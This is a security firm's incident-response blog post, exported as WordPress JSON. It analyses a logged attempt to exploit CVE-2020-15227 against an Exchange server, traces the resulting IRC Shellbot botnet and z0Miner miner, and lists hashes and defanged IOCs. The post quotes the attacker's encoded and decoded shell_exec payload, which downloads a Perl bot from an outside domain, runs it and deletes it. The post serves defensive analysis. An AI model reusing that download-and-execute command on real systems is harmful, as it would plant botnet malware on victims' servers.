{"id":14849,"date":"2021-06-15T10:05:46","date_gmt":"2021-06-15T08:05:46","guid":{"rendered":"https:\/\/www.secuinfra.com\/?p=14849"},"modified":"2022-04-01T09:27:30","modified_gmt":"2022-04-01T07:27:30","slug":"incident-response-diary","status":"publish","type":"post","link":"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/","title":{"rendered":"Incident Response Diary"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_83 counter-flat ez-toc-counter ez-toc-white ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">[inhalt_uebersetzt]<\/p>\n<span class=\"ez-toc-title-toggle\"><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Overview\" >Overview<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Identifying_IOCs\" >Identifying IOCs<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Conclusion\" >Conclusion<\/a><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"Overview\"><\/span>Overview<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At the time of the deployment, large-scale exploitation of the vulnerabilities was still fairly new, which is why we used the <a  href=\"https:\/\/www.volexity.com\/blog\/2021\/03\/02\/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities\/\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >Volexity<\/a> blog post, among others, to identify IOCs. 
One possible IOC was the python-requests\/* user agent.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Identifying_IOCs\"><\/span>Identifying IOCs<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>During our analysis, in addition to the expected IOCs for the ProxyLogon\/Hafnium vulnerability, we were able to identify an IOC of another vulnerability. The following excerpt was taken from the httpproxy logs of the affected Exchange Server and indicates attempted exploitation of <a  href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-15227\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >CVE-2020-15227<\/a>. This is a vulnerability in the PHP framework &#8220;Nette&#8221;.<\/p>\n<blockquote>\n<pre><code class=\"language-text\">Python-urllib\/3.5,192.168.1.247,&lt;HOSTNAME&gt;,url=https%3a%2f%2f&lt;IP-Address&gt;%2fowa%2fnette.micro%23callback%3dshell_exec%26cmd%3dcd%2b%252ftmp%253bwget%2bandmee.com%252f.x%252fb%253bcurl%2b-O%2bhttp%253a%252f%252fandmee.com%252f.x%252fb%253bfetch%2bhttp%253a%252f%252fandmee.com%252f.x%252fb%253bperl%2bb%253brm%2b-rf%2bb*&amp;reason=0,,Begin-Request=2021-02-26T09:25:09.655Z; End-Request=2021-02-26T09:25:09.656Z;,,,<\/code><\/pre>\n<\/blockquote>\n<p>The vulnerability allows remote code execution under certain circumstances. 
The above call decodes to the following commands.<\/p>\n<ul>\n<li>https:\/\/&lt;IP-Address&gt;\/owa\/<strong>nette.micro<\/strong>#callback=shell_exec&amp;cmd=cd \/tmp; wget andmee[.]com\/.x\/b<\/li>\n<li>curl -O http:\/\/andmee[.]com\/.x\/b<\/li>\n<li>fetch http:\/\/andmee[.]com\/.x\/b<\/li>\n<li>perl b; rm -rf b<\/li>\n<\/ul>\n<p>The commands aim to download the Perl script b from the andmee[.]com domain, execute it and then delete the script.<\/p>\n<p>According to our research, the Perl script, in a modified form, was first <a  href=\"https:\/\/www.inforge.net\/forum\/threads\/stealth-shellbot-vers%D0%B3o-0-2-by-thiago-x.155975\/\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >published<\/a> in 2007. Communication between the zombie and the command and control (C2) server takes place over Internet Relay Chat (IRC).<br \/>\nSystems compromised by the botnet offer functions such as DDoS, port scanning and file download routines.<\/p>\n<p>Within the Perl script, the attacker only changed configuration values, for example the C2 IP address, the port used and the IRC channel names. Based on our code analysis, we decided to run the script b within our malware lab and capture the network traffic. 
Below is a screenshot of the network traffic of file b.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-14810\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-300x159.png\" alt=\"\" width=\"521\" height=\"276\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-300x159.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-1024x541.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-768x406.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-1536x812.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-24x13.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-36x19.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-48x25.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred.png 1918w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p>The screenshot above shows the initial connection to the IRC botnet. 
No further communication could be detected.<br \/>\nWe therefore decided to establish a manual connection via an IRC client.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-14827\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/IRC_xmr1_blurred-300x104.png\" alt=\"\" width=\"747\" height=\"259\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-300x104.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-1024x356.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-768x267.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-1536x534.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-2048x712.png 2048w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-24x8.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-36x13.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-48x17.png 48w\" sizes=\"(max-width: 747px) 100vw, 747px\" \/><\/p>\n<p>At the time of our analysis, there were no other participants in the IRC chat except for the operator of the channel.<\/p>\n<p>In the next step of our analysis, we looked at the contents of the .x folder on the web server.<br \/>\nThe following screenshot shows a list of the files that were in the repository.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-14832\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/index_of_x_blurred-142x300.png\" alt=\"\" width=\"275\" height=\"581\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-142x300.png 142w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-484x1024.png 484w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-768x1624.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-726x1536.png 
726w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-11x24.png 11w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-17x36.png 17w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-23x48.png 23w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred.png 511w\" sizes=\"(max-width: 275px) 100vw, 275px\" \/><\/p>\n<p>In addition to the b file, we looked at other files within the repository. This procedure included the subfolders \/.s as well as \/.p. Both subfolders contained similar files. These include the file crond, which, according to our research, is one of the crypto-miners (z0Miner).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14815\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/FALCON_DFIR_1_-300x60.png\" alt=\"\" width=\"555\" height=\"111\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-300x60.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-1024x205.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-768x154.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-24x5.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-36x7.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-48x10.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_.png 1356w\" sizes=\"(max-width: 555px) 100vw, 555px\" \/><\/p>\n<p>In addition to the file b mentioned at the beginning, we analyzed the file bot.<br \/>\nThe execution of the Perl script bot within our malware analysis lab let us record the following network intercept:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14816\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/Wireshark_IRC-Communication_blurred-300x186.png\" alt=\"\" 
width=\"665\" height=\"412\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-300x186.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-1024x636.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-768x477.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-1536x954.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-24x15.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-36x22.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-48x30.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred.png 1932w\" sizes=\"(max-width: 665px) 100vw, 665px\" \/><\/p>\n<p>At the time of the analysis, no commands could be identified that were transmitted to the botnet via the IRC channel.<br \/>\nFor further analysis of the IRC server, we decided to manually connect to the IRC server again. After we were able to connect successfully, we were able to identify 22 active participants in the channel #cocina. 
#cocina is the channel on the IRC server that was specified in the script.<br \/>\nHowever, we could not determine whether the participants were infected systems waiting for commands or other IT security researchers.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14817\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/IRC_cocina_blurred-300x112.png\" alt=\"\" width=\"683\" height=\"255\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-300x112.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-1024x382.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-768x287.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-1536x573.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-24x9.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-36x13.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-48x18.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred.png 1816w\" sizes=\"(max-width: 683px) 100vw, 683px\" \/><\/p>\n<p>While we were observing the IRC channel, no further communication between us and the channel could be detected, and no communication took place within the channel either.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span><strong>Conclusion<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As always, early and frequent patching applies to this scenario too!<\/p>\n<p>As soon as a public proof of concept for a vulnerability is available, the affected systems should be updated. 
If it is not possible to install the hotfixes promptly, the systems should be isolated to prevent possible damage.<br \/>\nIn our deployment, the CVE-2020-15227 vulnerability could not be exploited because the affected customer was not using the PHP framework.<\/p>\n<p><strong>MD5 hashes<\/strong><\/p>\n<ul>\n<li>\/.s\/crond = 373b018bef17e04d8ff29472390403f9<\/li>\n<li>\/.p\/crond = 9d099882a24757ac5033b0c675fecbe5<\/li>\n<li>bot = 4f894225ec322479a73a4396689494ac<\/li>\n<li>b = 1cac8098cd20b6c9e9c82542946795b3<\/li>\n<\/ul>\n<p><strong>IP addresses \/ domains<\/strong><\/p>\n<ul>\n<li>5.39.217[.]212 (IRC server from bot)<\/li>\n<li>198.98.61[.]106 (IRC server from b)<\/li>\n<li>64.32.6[.]143 (IRC server from nnx)<\/li>\n<li>pool.supportxmr[.]com:3333 (pool URL from .p\/confg.json)<\/li>\n<li>85.204.116[.]140:443 (pool IP from .s\/config.json)<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In addition to the expected IOCs for the ProxyLogon\/Hafnium vulnerability, our analysis identified one IOC of another 
vulnerability.<\/p>\n","protected":false},"author":6,"featured_media":27641,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[85,86,81],"tags":[],"dpc_coauthors":[],"class_list":["post-14849","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-digital-forensics","category-incident-response","category-techtalk"],"acf":[],"_links":{"self":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/14849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/comments?post=14849"}],"version-history":[{"count":0,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/14849\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/media\/27641"}],"wp:attachment":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/media?parent=14849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/categories?post=14849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/tags?post=14849"},{"taxonomy":"dpc_coauthors","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/dpc_coauthors?post=14849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}